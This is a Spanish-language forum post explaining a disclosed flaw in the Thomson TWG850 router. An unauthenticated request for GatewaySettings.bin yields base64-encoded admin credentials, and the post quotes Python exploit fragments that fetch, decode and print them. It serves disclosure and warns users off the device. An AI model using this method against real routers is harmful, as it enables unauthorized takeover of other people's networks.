Obtener los credenciales de administrador de un Thomson TWG850 (Pagina 1) / Otras marcas / Foro Wifi-libre.com

El libre pensamiento para un internet libre

No estas registrado.     

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#1 05-09-2015 10:19:11

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 3,040

Obtener los credenciales de administrador de un Thomson TWG850

Obtener los credenciales de administrador de un Thomson TXG850

Thom1.jpg

  Esto no es una lavadora: es un router.
Un router un  "poco" anticuado con un diseño muy "Thomson" (ex-speedtouch, ahora Technicolor) .
¿Será por intentar hacer olvidar que crearon estos monstruos que esta empresa ha cambiado de nombre tantas veces? tongue
Y tienen una brecha muy seria que permite a un intruso o a uno usuario no autorizado de hacerse con la contraseña root del dispositivo.
Podemos ver el "exploit" en este tema de packet storm :

Lo que ocurre es que los credenciales están

  1. en un fichero accesible  sin conocer la contraseña root

  2. cifrados en base 64 y es una función de hash reversible

1. Se pasa por CatewaySettings.bin : vemos la variable "bifi" definida aquí

bifi  = 'GatewaySettings.bin'

Par ser empleada en la petición

req = urllib2.Request('%s/%s'%(router,bifi))

2. Aquí vemos como se hace el descifrado (base 64 ) con un bucle "for"

for s in hr_data(bifi):
            try:
                dec = base64.decodestring(s)

Y luego se pillan  los datos con el "bucle if"
               

 if dec.find(':') != -1:
                    user,passwd = dec.split(':')
                    print '(+)- User: %s%s%s'%(G_C,user,D_C)
                    print '(+)- Pass: %s%s%s'%(G_C,passwd,D_C)
                     
                    print '(+)- Checking if creds are OK...'
                    checkcreds(router,user,passwd)

No hay  remedio y no habrán actualizaciones para este router.   
No es aconsejable usarlo como router para su red domestica.

Los créditos para este full disclosure van a  Glaysson dos Santos
  Fuente:

Desconectado

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

Temas similares

Tema Respuestas Vistas Ultimo mensaje
5 60 Ayer 23:48:23 por kcdtv
Pegado:
178 18587 Ayer 23:41:26 por managuas
2 134 Ayer 22:45:29 por favy87
17 1310 Ayer 13:14:48 por kcdtv
1 97 Ayer 13:00:04 por kcdtv

Pie de página

Información del usuario

Ultimo usuario registrado: favy87
Usuarios registrados conectados: 0
Invitados conectados: 8

Estadisticas de los foros

Número total de usuarios registrados: 612
Número total de temas: 838
Número total de mensajes: 6,723

Máx. usuarios conectados: 61 el 28-03-2017 00:04:22